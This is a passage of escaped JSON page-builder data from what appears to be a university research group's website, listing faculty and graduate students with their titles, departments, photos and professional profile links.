Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/raj-sunderraman-a5591bb2\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/raj-sunderraman\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?hl=en&user=Wlxc9FEAAAAJ\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882}]},\"parentId\":\"182-c16\",\"index\":1,\"id\":\"182-c21\",\"partialId\":182,\"styleRef\":981,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c22\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c23\",\"partialId\":182,\"styleRef\":982,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-SRM-360x360-1-e1697202435329.png\",\"caption\":{\"text\":\"\"},\"imageId\":1704,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c22\",\"index\":0,\"id\":\"182-c24\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Susie Ramisetty-Mikler\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":2,\"id\":\"182-c25\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Research Associate Professor<\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c26\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Population Health Sciences<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/susie-ramisetty-mikler-7a0b3014\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/publichealth.gsu.edu\\/profile\\/susie-ramisetty-mikler\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=KzNVJwIAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.087331887226354}]},\"parentId\":\"182-c22\",\"index\":1,\"id\":\"182-c27\",\"partialId\":182,\"styleRef\":983,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c28\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c29\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-zelikovsky.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":704,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c28\",\"index\":0,\"id\":\"182-c30\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Alex Zelikovsky\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":2,\"id\":\"182-c31\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Distinguished University Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c32\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/alex-zelikovsky-48a2795\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/alex-zelikovsky\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=UzCRNJwAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c28\",\"index\":1,\"id\":\"182-c33\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c34\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c35\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-bourgeois.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":696,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c34\",\"index\":0,\"id\":\"182-c36\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Anu Bourgeois\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":2,\"id\":\"182-c37\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c38\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anu-bourgeois-09b7b32b\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/anu-bourgeois\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=qsAUgQ8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c34\",\"index\":1,\"id\":\"182-c39\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c40\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c41\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/08\\/hu_new-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1348,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c40\",\"index\":0,\"id\":\"182-c42\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Xiaolin Hu\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":2,\"id\":\"182-c43\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Professor<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c44\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/csds.gsu.edu\\/profile\\/xiaolin-hu\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=zeU19nAAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c40\",\"index\":1,\"id\":\"182-c45\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c46\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c47\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/cropped-patterson.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1391,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c46\",\"index\":0,\"id\":\"182-c48\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Murray Patterson\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":2,\"id\":\"182-c49\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Assistant Professor&nbsp;<\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c50\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/murray-patterson-449a947\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/murray-patterson\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=X4J8vAEAAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c46\",\"index\":1,\"id\":\"182-c51\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c52\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c53\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-cropped-cropped-Taylor-shelton_300x300-e1697143561739.jpeg\",\"caption\":{\"text\":\"\"},\"imageId\":1681,\"size\":\"\"},\"domuuid\":\"182-c428\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c52\",\"index\":0,\"id\":\"182-c54\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Taylor Shelton\"},\"domuuid\":\"182-c429\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":2,\"id\":\"182-c55\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p><span style=\\\"color: rgb(64, 85, 169); font-family: Open Sans; font-size: 16px; font-weight: 400;\\\">Assistant Professor<\\/span><\\/p>\"},\"domuuid\":\"182-c430\"},{\"name\":\"hop-text\",\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c56\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"},\"domuuid\":\"182-c431\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/taylor-shelton-28a4b3291\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/cas.gsu.edu\\/profile\\/taylor-shelton\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=WFA1Ry8AAAAJ&hl=en\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c52\",\"index\":1,\"id\":\"182-c57\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"182-c432\"}],\"styleRef\":972,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c58\",\"parentId\":\"182-c3\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c59\",\"partialId\":182,\"styleRef\":973,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-cropped-Hassan-Babaie-300x300-1-e1697143646400.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1682,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c58\",\"index\":0,\"id\":\"182-c60\",\"partialId\":182,\"styleRef\":974,\"type\":\"content\",\"props\":{\"content\":\"Hassan Babaie\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":2,\"id\":\"182-c61\",\"partialId\":182,\"styleRef\":975,\"type\":\"content\",\"props\":{\"content\":\"<p>Associate Professor<br><\\/p>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c62\",\"partialId\":182,\"styleRef\":976,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/external-link\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/geosciences.gsu.edu\\/profile\\/hassan-babaie\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.39751110599882},{\"name\":\"socicon\\/googlescholar\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.researchgate.net\\/profile\\/Hassan-Babaie\\/4\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false,\"lightboxMedia\":\"\"}}]},\"parentId\":\"182-c58\",\"index\":1,\"id\":\"182-c63\",\"partialId\":182,\"styleRef\":977,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":972,\"type\":\"content\"}],\"id\":\"182-c3\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":971,\"type\":\"content\"}],\"id\":\"182-c2\",\"parentId\":\"182-c1\",\"partialId\":182,\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Faculty\"},\"id\":\"182-c66\",\"parentId\":\"182-c65\",\"partialId\":182,\"styleRef\":986,\"type\":\"content\"}],\"id\":\"182-c65\",\"parentId\":\"182-c64\",\"partialId\":182,\"styleRef\":985,\"type\":\"content\"}],\"id\":\"182-c64\",\"parentId\":\"182-c2\",\"partialId\":182,\"styleRef\":984,\"type\":\"content\"}]},\"styleRef\":970,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"Grads\",\"attrs\":{\"id\":\"grads\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"id\":\"182-c69\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c70\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/10\\/cropped-282038166_2492815234187345_4129762528023780269_n-e1697142834100.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1659,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c69\",\"index\":0,\"id\":\"182-c71\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Sundos Al Subhi<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c69\",\"index\":2,\"id\":\"182-c72\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c69\",\"index\":3,\"id\":\"182-c73\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/sundos-al-subhi-88bb97150\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c69\",\"index\":1,\"id\":\"182-c74\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c75\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c76\",\"partialId\":182,\"styleRef\":849,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/06\\/cropped-IMG_1240-scaled-1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1336,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c75\",\"index\":0,\"id\":\"182-c77\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Aaja Christie<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c75\",\"index\":2,\"id\":\"182-c78\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c75\",\"index\":3,\"id\":\"182-c79\",\"partialId\":182,\"styleRef\":901,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/aaja-christie-17573657\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c75\",\"index\":1,\"id\":\"182-c80\",\"partialId\":182,\"styleRef\":853,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c81\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c82\",\"partialId\":182,\"styleRef\":856,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Emma.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":966,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c81\",\"index\":0,\"id\":\"182-c83\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Emma McDaniel<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c81\",\"index\":2,\"id\":\"182-c84\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Candidate<br><\\/p>\"}},{\"name\":\"hop-text\",\"styleRef\":852,\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c85\",\"partialId\":182,\"type\":\"content\"},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/emmamcdaniel\\/\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707},{\"link\":{\"value\":\"https:\\/\\/scholar.google.com\\/citations?user=Cwt8OwkAAAAJ&hl=en\"},\"name\":\"socicon\\/googlescholar\"}]},\"parentId\":\"182-c81\",\"index\":1,\"id\":\"182-c86\",\"partialId\":182,\"styleRef\":857,\"type\":\"content\",\"domuuid\":\"5-c336\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c87\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c88\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/anupam.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1624,\"size\":\"\"}},{\"name\":\"hop-heading\",\"parentId\":\"182-c87\",\"index\":0,\"id\":\"182-c89\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Anupam Sarker<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c87\",\"index\":2,\"id\":\"182-c90\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c87\",\"index\":3,\"id\":\"182-c91\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/anupam-sarker-b164b412a\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c87\",\"index\":1,\"id\":\"182-c92\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c93\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c94\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Ardavan.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":863,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c93\",\"index\":0,\"id\":\"182-c95\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Ardavan Sassini\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c93\",\"index\":2,\"id\":\"182-c96\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>PhD Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c93\",\"index\":3,\"id\":\"182-c97\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"https:\\/\\/www.linkedin.com\\/in\\/ardavansassani\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c93\",\"index\":1,\"id\":\"182-c98\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c99\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c100\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/04\\/cropped-Jean.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1094,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c99\",\"index\":0,\"id\":\"182-c101\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Jean Guo\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c99\",\"index\":2,\"id\":\"182-c102\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Ph.D. Student<\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c99\",\"index\":3,\"id\":\"182-c103\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Computer Science<br><\\/p>\"}}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c104\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c105\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/03\\/cropped-Basit-2.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":838,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c104\",\"index\":0,\"id\":\"182-c106\",\"partialId\":182,\"styleRef\":850,\"type\":\"content\",\"props\":{\"content\":\"Basit Damilare Amuda\"}},{\"name\":\"hop-text\",\"parentId\":\"182-c104\",\"index\":2,\"id\":\"182-c107\",\"partialId\":182,\"styleRef\":851,\"type\":\"content\",\"props\":{\"content\":\"<p>Master\'s Student<br><\\/p>\"}},{\"name\":\"hop-text\",\"slot\":null,\"parentId\":\"182-c104\",\"index\":3,\"id\":\"182-c108\",\"partialId\":182,\"styleRef\":902,\"type\":\"content\",\"props\":{\"content\":\"<p>Geosciences<\\/p>\"}},{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"socicon\\/linkedin\",\"type\":\"svg\",\"link\":{\"value\":\"http:\\/\\/linkedin.com\\/in\\/basit-amuda-227098238\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"id\":0.52085899878707}]},\"parentId\":\"182-c104\",\"index\":1,\"id\":\"182-c109\",\"partialId\":182,\"styleRef\":855,\"type\":\"content\",\"domuuid\":\"5-c303\"}],\"styleRef\":848,\"type\":\"content\"},{\"name\":\"hop-column\",\"id\":\"182-c110\",\"parentId\":\"182-c68\",\"partialId\":182,\"children\":[{\"name\":\"hop-image\",\"parentId\":\"182-c110\",\"index\":0,\"id\":\"182-c111\",\"partialId\":182,\"styleRef\":854,\"type\":\"content\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2023\\/09\\/sara-edwards1.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":1399,\"size\":\"\"},\"domuuid\":\"182-c79\"},{\"name\":\"hop-heading\",\"parentId\":\"182-c110\"